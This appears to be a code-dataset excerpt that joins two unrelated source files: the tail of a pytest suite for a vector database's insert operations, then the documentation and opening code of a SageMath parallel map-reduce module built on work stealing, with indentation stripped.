method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = 50000
future = connect.insert(collection, gen_entities(nb), _async=True, _callback=self.check_result)
result = future.result()
assert len(result.primary_keys) == nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_callback_timeout(self, connect, collection):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
nb = 100000
future = connect.insert(collection, gen_entities(nb), _async=True, _callback=self.check_status, timeout=1)
with pytest.raises(Exception) as e:
result = future.result()
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async_invalid_params(self, connect):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
collection_new = gen_unique_str()
future = connect.insert(collection_new, default_entities, _async=True)
future.done()
with pytest.raises(Exception) as e:
result = future.result()
# 1339
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_params_raise_exception(self, connect, collection):
'''
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
'''
entities = []
future = connect.insert(collection, entities, _async=True)
future.done()
with pytest.raises(Exception) as e:
future.result()
class TestInsertMultiCollections:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_entity_multi_collections(self, connect):
'''
target: test insert entities
method: create 10 collections and insert entities into them in turn
expected: row count
'''
collection_num = 10
collection_list = []
for i in range(collection_num):
collection_name = gen_unique_str(uid)
collection_list.append(collection_name)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection_name, default_entities)
connect.flush([collection_name])
assert len(result.primary_keys) == default_nb
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == default_nb
for i in range(collection_num):
connect.drop_collection(collection_list[i])
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_insert_entity_another(self, connect, collection):
'''
target: test insert vector to collection_1 after collection_2 deleted
method: delete collection_2 and insert vector to collection_1
expected: row count equals the length of entities inserted
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.drop_collection(collection)
result = connect.insert(collection_name, default_entity)
connect.flush([collection_name])
assert len(result.primary_keys) == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_insert_entity_another(self, connect, collection, get_simple_index):
'''
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection_name, default_entity)
assert len(result.primary_keys) == 1
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
connect.drop_collection(collection_name)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_entity_create_index_another(self, connect, collection, get_simple_index):
'''
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection_name, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection_name, "")
create_target_index(get_simple_index, field_name)
assert index == get_simple_index
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_entity_sleep_create_index_another(self, connect, collection, get_simple_index):
'''
target: test insert vector to collection_2 after build index for collection_1 for a while
method: build index and insert vector
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection_name, field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_search_entity_insert_entity_another(self, connect, collection):
'''
target: test insert entity to collection_1 after search collection_2
method: search collection and insert entity
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.load_collection(collection)
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
connect.insert(collection_name, default_entity)
connect.flush([collection_name])
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_entity_search_entity_another(self, connect, collection):
'''
target: test insert entity to collection_1 after search collection_2
method: search collection and insert entity
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.load_collection(collection_name)
res = connect.search(collection_name, default_single_query)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_entity_sleep_search_entity_another(self, connect, collection):
'''
target: test insert entity to collection_1 after search collection_2 a while
method: search collection, sleep, and insert entity
expected: status ok
'''
collection_name = gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.load_collection(collection_name)
res = connect.search(collection_name, default_single_query)
assert len(res[0]) == 0
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_entity_during_release_collection(self, connect, collection):
'''
target: test insert entity during release
method: release collection async, then do insert operation
expected: insert ok
'''
for i in range(10):
connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
def release():
connect.release_collection(collection)
t = threading.Thread(target=release, args=(collection,))
t.start()
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
class TestInsertInvalid(object):
"""
Test inserting vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_invalid(self, connect, id_collection, get_entity_id):
'''
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise an exception
'''
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.insert(id_collection, default_entities, ids)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_collection_name(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception):
connect.insert(collection_name, default_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_partition_name(self, connect, collection, get_tag_name):
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
if tag_name is not None:
with pytest.raises(Exception):
connect.insert(collection, default_entity, partition_name=tag_name)
else:
connect.insert(collection, default_entity, partition_name=tag_name)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_name(self, connect, collection, get_field_name):
tmp_entity = update_field_name(copy.deepcopy(default_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_type(self, connect, collection, get_field_type):
field_type = get_field_type
tmp_entity = update_field_type(copy.deepcopy(default_entity), 'float', field_type)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_value(self, connect, collection, get_field_int_value):
field_value = get_field_int_value
tmp_entity = update_field_type(copy.deepcopy(default_entity), 'int64', field_value)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entity_value(self, connect, collection, get_field_vectors_value):
tmp_entity = copy.deepcopy(default_entity)
src_vector = tmp_entity[-1]["values"]
src_vector[0][1] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
class TestInsertInvalidBinary(object):
"""
Test inserting vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_name(self, connect, binary_collection, get_field_name):
tmp_entity = update_field_name(copy.deepcopy(default_binary_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_value(self, connect, binary_collection, get_field_int_value):
tmp_entity = update_field_type(copy.deepcopy(default_binary_entity), 'int64', get_field_int_value)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entity_value(self, connect, binary_collection, get_field_vectors_value):
tmp_entity = copy.deepcopy(default_binary_entity)
src_vectors = tmp_entity[-1]["values"]
src_vectors[0] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_invalid(self, connect, binary_id_collection, get_entity_id):
'''
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise an exception
'''
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.insert(binary_id_collection, default_binary_entities, ids)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_type(self, connect, binary_collection, get_field_type):
"""
target: test insert with invalid field type
method: insert with invalid field type
expected: raise exception
"""
field_type = get_field_type
tmp_entity = update_field_type(copy.deepcopy(default_binary_entity), 'int64', field_type)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entities_value(self, connect, binary_collection, get_field_vectors_value):
"""
target: test insert with invalid field
method: insert with invalid field value
expected: raise exception
"""
tmp_entities = copy.deepcopy(default_binary_entities)
src_vector = tmp_entities[-1]["values"]
src_vector[1] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entities)
|
map_reduce.py | r"""
Parallel computations using RecursivelyEnumeratedSet and Map-Reduce
There is an efficient way to distribute computations on a set
`S` of objects defined by :func:`RecursivelyEnumeratedSet`
(see :mod:`sage.sets.recursively_enumerated_set` for more details)
over which one would like to perform the following kind of operations:
* Compute the cardinality of a (very large) set defined recursively
(through a call to :class:`RecursivelyEnumeratedSet
of forest type<sage.combinat.backtrack.SearchForest>`)
* More generally, compute any kind of generating series over this set
* Test a conjecture, e.g. find an element of `S` satisfying a specific
property, or check that none does or that they all do
* Count/list the elements of `S` that have a specific property
* Apply any map/reduce kind of operation over the elements of `S`
AUTHORS:
- Florent Hivert -- code, documentation (2012--2016)
- Jean Baptiste Priez -- prototype, debugging help on MacOSX (2011-June, 2016)
- Nathann Cohen -- some documentation (2012)
Contents
--------
- :ref:`basic-usage`
- :ref:`advanced-use`
- :ref:`profiling`
- :ref:`logging`
- :ref:`protocol-description`
- :ref:`examples`
How is this different from usual MapReduce ?
--------------------------------------------
This implementation is specific to :class:`RecursivelyEnumeratedSet
of forest type<sage.combinat.backtrack.SearchForest>`, and uses its
properties to do its job. Not only mapping and reducing but also
**generating the elements** of `S` is done on different processors.
.. _basic-usage:
How can I use all that stuff?
-----------------------------
First, you need the information necessary to describe a
:class:`RecursivelyEnumeratedSet of forest
type<sage.combinat.backtrack.SearchForest>` representing your set `S` (see
:mod:`sage.sets.recursively_enumerated_set`). Then, you need to provide a
"map" function as well as a "reduce" function. Here are some examples:
* **Counting the number of elements.** In this situation, the map function
can be set to ``lambda x: 1``, and the reduce function just adds the
values together, i.e. ``lambda x, y: x + y``.
We count binary words of length `\leq 16`::
sage: seeds = [[]]
sage: succ = lambda l: [l + [0], l + [1]] if len(l) < 16 else []
sage: S = RecursivelyEnumeratedSet(seeds, succ,
....: structure='forest', enumeration='depth')
sage: map_function = lambda x: 1
sage: reduce_function = lambda x, y: x + y
sage: reduce_init = 0
sage: S.map_reduce(map_function, reduce_function, reduce_init)
131071
This matches the number of binary words of length `\leq 16`::
sage: factor(131071 + 1)
2^17
Note that the map and reduce functions here have the default values of the
:meth:`sage.combinat.backtrack.SearchForest.map_reduce` method
so that the number of elements can be obtained more simply with::
sage: S.map_reduce()
131071
Instead of using :func:`RecursivelyEnumeratedSet`, one can directly use
:class:`RESetMapReduce`, which gives finer
control over the parallel execution (see :ref:`advanced-use` below)::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(
....: roots=[[]],
....: children=lambda l: [l + [0], l + [1]] if len(l) < 16 else [],
....: map_function=lambda x: 1,
....: reduce_function=lambda x, y: x + y,
....: reduce_init=0)
sage: S.run()
131071
* **Generating series.** For this, take a Map function that associates a
monomial to each element of `S`, while the Reduce function is still equal to
``lambda x, y: x + y``.
We compute the generating series for counting binary words of each
length `\leq 16`::
sage: S = RecursivelyEnumeratedSet(
....: [[]], lambda l: [l + [0], l + [1]] if len(l) < 16 else [],
....: structure='forest', enumeration='depth')
sage: x = polygen(ZZ)
sage: sp = S.map_reduce(
....: map_function=lambda z: x**len(z),
....: reduce_function=lambda x, y: x + y,
....: reduce_init=0)
sage: sp
65536*x^16 + 32768*x^15 + 16384*x^14 + 8192*x^13 + 4096*x^12
+ 2048*x^11 + 1024*x^10 + 512*x^9 + 256*x^8 + 128*x^7 + 64*x^6
+ 32*x^5 + 16*x^4 + 8*x^3 + 4*x^2 + 2*x + 1
This is of course `\sum_{i=0}^{16} (2x)^i`::
sage: sp == sum((2*x)^i for i in range(17))
True
Here is another example where we count permutations of size `\leq 8` (here
we use the default values)::
sage: S = RecursivelyEnumeratedSet(
....: [[]],
....: lambda l: ([l[:i] + [len(l)] + l[i:]
....: for i in range(len(l) + 1)] if len(l) < 8 else []),
....: structure='forest',
....: enumeration='depth')
sage: x = polygen(ZZ)
sage: sp = S.map_reduce(lambda z: x**len(z)); sp
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
This is of course `\sum_{i=0}^{8} i! x^i`::
sage: sp == sum(factorial(i)*x^i for i in range(9))
True
* **Post Processing.** We now demonstrate the use of ``post_process``. We
generate the permutation as previously, but we only perform the map/reduce
computation on those of even ``len``. Of course we get the even part of the
previous generating series::
sage: S = RecursivelyEnumeratedSet(
....: [[]],
....: lambda l: ([l[:i] + [len(l) + 1] + l[i:]
....: for i in range(len(l) + 1)] if len(l) < 8 else []),
....: post_process=lambda l: l if len(l) % 2 == 0 else None,
....: structure='forest',
....: enumeration='depth')
sage: sp = S.map_reduce(lambda z: x**len(z)); sp
40320*x^8 + 720*x^6 + 24*x^4 + 2*x^2 + 1
This is also useful for example to call a constructor on the generated
elements::
sage: S = RecursivelyEnumeratedSet(
....: [[]],
....: lambda l: ([l[:i] + [len(l) + 1] + l[i:]
....: for i in range(len(l) + 1)] if len(l) < 5 else []),
....: post_process=lambda l: Permutation(l) if len(l) == 5 else None,
....: structure='forest',
....: enumeration='depth')
sage: x = polygen(ZZ)
sage: sp = S.map_reduce(lambda z: x**z.number_of_inversions()); sp
x^10 + 4*x^9 + 9*x^8 + 15*x^7 + 20*x^6 + 22*x^5 + 20*x^4 + 15*x^3 + 9*x^2 + 4*x + 1
We get here a polynomial which is the `q`-factorial (in the variable `x`) of `5`,
that is, `\prod_{i=1}^{5} \frac{1-x^i}{1-x}`::
sage: x = polygen(ZZ)
sage: prod((1-x^i)//(1-x) for i in range(1, 6))
x^10 + 4*x^9 + 9*x^8 + 15*x^7 + 20*x^6 + 22*x^5 + 20*x^4 + 15*x^3 + 9*x^2 + 4*x + 1
Compare::
sage: from sage.combinat.q_analogues import q_factorial
sage: q_factorial(5)
q^10 + 4*q^9 + 9*q^8 + 15*q^7 + 20*q^6 + 22*q^5 + 20*q^4 + 15*q^3 + 9*q^2 + 4*q + 1
* **Listing the objects.** One can also compute the list of objects in a
:class:`RecursivelyEnumeratedSet of forest type<sage.combinat.backtrack.SearchForest>`
using :class:`RESetMapReduce`. As an example, we compute the set of numbers
between 1 and 63, generated by their binary expansion::
sage: S = RecursivelyEnumeratedSet(
....: [1],
....: lambda l: [(l<<1)|0, (l<<1)|1] if l < 1<<5 else [],
....: structure='forest',
....: enumeration='depth')
Here is the list computed without :class:`RESetMapReduce`::
sage: serial = list(S)
sage: serial
[1, 2, 4, 8, 16, 32, 33, 17, 34, 35, 9, 18, 36, 37, 19, 38, 39, 5, 10,
20, 40, 41, 21, 42, 43, 11, 22, 44, 45, 23, 46, 47, 3, 6, 12, 24, 48,
49, 25, 50, 51, 13, 26, 52, 53, 27, 54, 55, 7, 14, 28, 56, 57, 29, 58,
59, 15, 30, 60, 61, 31, 62, 63]
Here is how to perform the parallel computation. The order of the lists
depends on the synchronisation of the various computation processes and
therefore should be considered as random::
sage: parall = S.map_reduce(lambda x: [x], lambda x, y: x + y, [])
sage: parall # random
[1, 3, 7, 15, 31, 63, 62, 30, 61, 60, 14, 29, 59, 58, 28, 57, 56, 6, 13,
27, 55, 54, 26, 53, 52, 12, 25, 51, 50, 24, 49, 48, 2, 5, 11, 23, 47,
46, 22, 45, 44, 10, 21, 43, 42, 20, 41, 40, 4, 9, 19, 39, 38, 18, 37,
36, 8, 17, 35, 34, 16, 33, 32]
sage: sorted(serial) == sorted(parall)
True
.. _advanced-use:
Advanced use
------------
Fine control over the execution of a map/reduce computation is achieved
via parameters passed to the :meth:`RESetMapReduce.run` method.
The following three parameters can be used:
- ``max_proc`` -- (integer, default: ``None``) if given, the
maximum number of worker processors to use. The actual number
is also bounded by the value of the environment variable
``SAGE_NUM_THREADS`` (the number of cores by default).
- ``timeout`` -- a timeout on the computation (default: ``None``)
- ``reduce_locally`` -- whether the workers should reduce locally
their work or sends results to the master as soon as possible.
See :class:`RESetMapReduceWorker` for details.
Here is an example or how to deal with timeout::
sage: from sage.parallel.map_reduce import (RESetMPExample, AbortError)
sage: EX = RESetMPExample(maxl=100)
sage: try:
....: res = EX.run(timeout=0.01)
....: except AbortError:
....: print("Computation timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation timeout
The following should not timeout even on a very slow machine::
sage: EX = RESetMPExample(maxl=8)
sage: try:
....: res = EX.run(timeout=60)
....: except AbortError:
....: print("Computation Timeout")
....: else:
....: print("Computation normally finished")
....: res
Computation normally finished
40320*x^8 + 5040*x^7 + 720*x^6 + 120*x^5 + 24*x^4 + 6*x^3 + 2*x^2 + x + 1
As for ``reduce_locally``, one should not see any difference, except for speed
during normal usage. Most of the time one should leave it set to ``True``,
unless one sets up a mechanism to consume the partial results as soon as they
arrive. See :class:`RESetParallelIterator` and in particular the ``__iter__``
method for a example of consumer use.
.. _profiling:
Profiling
---------
It is possible to profile a map/reduce computation. First we create a
:class:`RESetMapReduce` object::
sage: from sage.parallel.map_reduce import RESetMapReduce
sage: S = RESetMapReduce(
....: roots=[[]],
....: children=lambda l: [l + [0], l + [1]] if len(l) < 16 else [],
....: map_function=lambda x: 1,
....: reduce_function=lambda x, y: x + y,
....: reduce_init=0)
The profiling is activated by the ``profile`` parameter. The value provided
should be a prefix (including a possible directory) for the profile dump::
sage: prof = tmp_dir('RESetMR_profile') + 'profcomp'
sage: res = S.run(profile=prof) # random
[RESetMapReduceWorker-1:58] (20:00:41.444) Profiling in
/home/user/.sage/temp/.../32414/RESetMR_profilewRCRAx/profcomp1
...
[RESetMapReduceWorker-1:57] (20:00:41.444) Profiling in
/home/user/.sage/temp/.../32414/RESetMR_profilewRCRAx/profcomp0
...
sage: res
131071
In this example, the profiles have been dumped in files such as
``profcomp0``. One can then load and print them as follows. See
:class:`cProfile.Profile` for more details::
sage: import cProfile, pstats
sage: st = pstats.Stats(prof+'0')
sage: st.strip_dirs().sort_stats('cumulative').print_stats() # random
...
Ordered by: cumulative time
ncalls tottime percall cumtime percall filename:lineno(function)
1 0.023 0.023 0.432 0.432 map_reduce.py:1211(run_myself)
11968 0.151 0.000 0.223 0.000 map_reduce.py:1292(walk_branch_locally)
...
<pstats.Stats instance at 0x7fedea40c6c8>
.. SEEALSO::
`The Python Profilers <https://docs.python.org/2/library/profile.html>`_
for more detail on profiling in python.
.. _logging:
Logging
-------
The computation progress is logged through a :class:`logging.Logger` in
``sage.parallel.map_reduce.logger`` together with :class:`logging.StreamHandler`
and a :class:`logging.Formatter`. They are currently configured to print
warning messages to the console.
.. SEEALSO::
`Logging facility for Python <https://docs.python.org/2/library/logging.html>`_
for more detail on logging and log system configuration.
.. note::
Calls to logger which involve printing the node are commented out in the
code, because the printing (to a string) of the node can be very time
consuming depending on the node and it happens before the decision whether
the logger should record the string or drop it.
.. _protocol-description:
How does it work ?
------------------
The scheduling algorithm we use here is any adaptation of :wikipedia:`Work_stealing`:
In a work stealing scheduler, each processor in a computer system has a
queue of work items (computational tasks, threads) to perform. [...]. Each
work items are initially put on the queue of the processor executing the
work item. When a processor runs out of work, it looks at the queues of
other processors and "steals" their work items. In effect, work stealing
distributes the scheduling work over idle processors, and as long as all
processors have work to do, no scheduling overhead occurs.
For communication we use Python's basic :mod:`multiprocessing` module. We
first describe the different actors and communication tools used by the
system. The work is done under the coordination of a **master** object (an
instance of :class:`RESetMapReduce`) by a bunch of **worker** objects
(instances of :class:`RESetMapReduceWorker`).
Each running map reduce instance works on a :class:`RecursivelyEnumeratedSet of
forest type<sage.combinat.backtrack.SearchForest>` called here `C` and is
coordinated by a :class:`RESetMapReduce` object called the **master**. The
master is in charge of launching the work, gathering the results and cleaning
up at the end of the computation. It doesn't perform any computation
associated to the generation of the element `C` nor the computation of the
mapped function. It however occasionally perform a reduce, but most reducing
is by default done by the workers. Also thanks to the work-stealing algorithm,
the master is only involved in detecting the termination of the computation
but all the load balancing is done at the level of the workers.
Workers are instances of :class:`RESetMapReduceWorker`. They are responsible
for doing the actual computations: element generation, mapping and reducing.
They are also responsible for the load balancing thanks to work-stealing.
Here is a description of the attributes of the **master** relevant to the
map-reduce protocol:
- ``_results`` -- a :class:`~multiprocessing.queues.SimpleQueue` where
the master gathers the results sent by the workers.
- ``_active_tasks`` -- a :class:`~multiprocessing.Semaphore` recording
the number of active tasks. The work is complete when it reaches 0.
- ``_done`` -- a :class:`~multiprocessing.Lock` which ensures that
shutdown is done only once.
- ``_aborted`` -- a :func:`~multiprocessing.Value` storing a shared
:class:`ctypes.c_bool` which is ``True`` if the computation was aborted
before all workers ran out of work.
- ``_workers`` -- a list of :class:`RESetMapReduceWorker` objects.
Each worker is identified by its position in this list.
Each **worker** is a process (:class:`RESetMapReduceWorker` inherits from
:class:`~multiprocessing.Process`) which contains:
- ``worker._iproc`` -- the identifier of the worker that is its position in the
master's list of workers
- ``worker._todo`` -- a :class:`collections.deque` storing of nodes of the
worker. It is used as a stack by the worker. Thiefs steal from the bottom of
this queue.
- ``worker._request`` -- a :class:`~multiprocessing.queues.SimpleQueue` storing
steal request submitted to ``worker``.
- ``worker._read_task``, ``worker._write_task`` -- a
:class:`~multiprocessing.queues.Pipe` used to transfert node during steal.
- ``worker._thief`` -- a :class:`~threading.Thread` which is in charge of
stealing from ``worker._todo``.
Here is a schematic of the architecture:
.. _figure-map_reduce_arch:
.. figure:: ../../media/map_reduce_arch.png
How thefts are performed
------------------------
During normal time, that is, when all workers are active, a worker ``W`` is
iterating though a loop inside
:meth:`RESetMapReduceWorker.walk_branch_locally`. Work nodes are taken from
and new nodes ``W._todo`` are appended to ``W._todo``. When a worker ``W``
runs out of work, that is, when ``worker._todo`` is empty, it tries to steal
some work (i.e., a node) from another worker. This is performed in the
:meth:`RESetMapReduceWorker.steal` method.
From the point of view of ``W``, here is what happens:
- ``W`` signals to the master that it is idle: ``master._signal_task_done``;
- ``W`` chooses a victim ``V`` at random;
- ``W`` sends a request to ``V``: it puts its identifier into ``V._request``;
- ``W`` tries to read a node from ``W._read_task``. Then three things may happen:
+ a proper node is read. Then the theft was a success and ``W`` starts
working locally on the received node.
+ ``None`` is received. This means that ``V`` was idle. Then ``W`` tries
another victim.
+ :exc:`AbortError` is received. This means either that the computation was
aborted or that it simply succeeded and that no more work is required by
``W``. Therefore an :exc:`AbortError` exception is raised leading ``W`` to
shutdown.
We now describe the protocol on the victim's side. Each worker process contains
a :class:`Thread` which we call ``T`` for thief which acts like some kind of
Troyan horse during theft. It is normally blocked waiting for a steal request.
From the point of view of ``V`` and ``T``, here is what happens:
- during normal time, ``T`` is blocked waiting on ``V._request``;
- upon steal request, ``T`` wakes up receiving the identification of ``W``;
- ``T`` signals to the master that a new task is starting by
``master._signal_task_start``;
- Two things may happen depending if the queue ``V._todo`` is empty or not.
Remark that due to the GIL, there is no parallel execution between the
victim ``V`` and its thief thread ``T``.
+ If ``V._todo`` is empty, then ``None`` is answered on
``W._write_task``. The task is immediately signaled to end the master
through ``master._signal_task_done``.
+ Otherwise, a node is removed from the bottom of ``V._todo``. The node is
sent to ``W`` on ``W._write_task``. The task will be ended by ``W``, that
is, when finished working on the subtree rooted at the node, ``W`` will
call ``master._signal_task_done``.
The end of the computation
--------------------------
To detect when a computation is finished, a synchronized integer is kept which
counts the number of active tasks. This is essentially a semaphore but
semaphores are broken on Darwin OSes so we ship two implementations depending
on the OS (see :class:`ActiveTaskCounter` and :class:`ActiveTaskCounterDarwin`
and the note below).
When a worker finishes working on a task, it calls
``master._signal_task_done``. This decreases the task counter
``master._active_tasks``. When it reaches 0, it means that there are no more
nodes: the work is completed. The worker executes ``master._shutdown``
which sends :exc:`AbortError` to all ``worker._request`` and
``worker._write_task`` queues. Each worker or thief thread receiving such
a message raises the corresponding exception, therefore stopping its work. A
lock called ``master._done`` ensures that shutdown is only done once.
Finally, it is also possible to interrupt the computation before its ends,
by calling ``master.abort()``. This is achieved by setting
``master._active_tasks`` to 0 and calling ``master._shutdown``.
.. warning:: The macOS Semaphore bug
Darwin OSes do not correctly implement POSIX's semaphore semantic.
Indeed, on these systems, acquire may fail and return False not only when
the semaphore is equal to zero but also **because someone else is trying
to acquire** at the same time. This makes using Semaphores impossible
on macOS so that on these systems we use a synchronized integer instead.
.. _examples:
Are there examples of classes?
------------------------------
Yes! Here they are:
- :class:`RESetMPExample` -- a simple basic example
- :class:`RESetParallelIterator` -- a more advanced example using non standard
communication configuration.
Tests
-----
Generating series for the sum of strictly decreasing lists of integers
smaller than 15::
sage: y = polygen(ZZ, 'y')
sage: R = RESetMapReduce(
....: roots=[([], 0, 0)] + [([i], i, i) for i in range(1, 15)],
....: children=lambda list_sum_last:
....: [(list_sum_last[0] + [i], list_sum_last[1] + i, i)
....: for i in range(1, list_sum_last[2])],
....: map_function=lambda li_sum_dummy: y**li_sum_dummy[1])
sage: sg = R.run()
sage: sg == prod((1 + y**i) for i in range(1, 15))
True
Classes and methods
-------------------
"""
from __future__ import print_function, absolute_import
import six
from threading import Thread
from six.moves import queue
from sage.sets.recursively_enumerated_set import RecursivelyEnumeratedSet # _generic
from sage.misc.lazy_attribute import lazy_attribute
import collections
import copy
import sys
import random
import ctypes
import logging
logger = logging.getLogger(__name__)
logger.__doc__ = (
"""
A logger for :mod:`sage.parallel.map_reduce`
.. SEEALSO::
`Logging facility for Python <https://docs.python.org/2/library/logging.html>`_
for more detail on logging and log system configuration.
""")
logger.setLevel(logging.WARN)
# logger.setLevel(logging.INFO)
# logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter(
'[%(processName)s-%(threadName)s] (%(asctime)s.%(msecs)03.f) %(message)s',
datefmt='%H:%M:%S')
ch.setFormatter(formatter)
logger.addHandler(ch)
if six.PY2:
import multiprocessing as mp
from multiprocessing.queues import SimpleQueue
# Put SimpleQueue in the multiprocessing top-level namespace for
# compatibility with Python 3
mp.SimpleQueue = SimpleQueue
del SimpleQueue
else:
# Set up a multiprocessing context to use for this modules (using the
# 'fork' method which is basically same as on Python 2)
import multiprocessing as mp
mp = mp.get_context('fork')
def proc_number(max_proc=None):
r"""
Return the number of processes to use.
INPUT:
- ``max_proc`` -- an upper bound on the number of processes or
``None``.
EXAMPLES::
sage: from sage.parallel.map_reduce import proc_number
sage: proc_number() # random
8
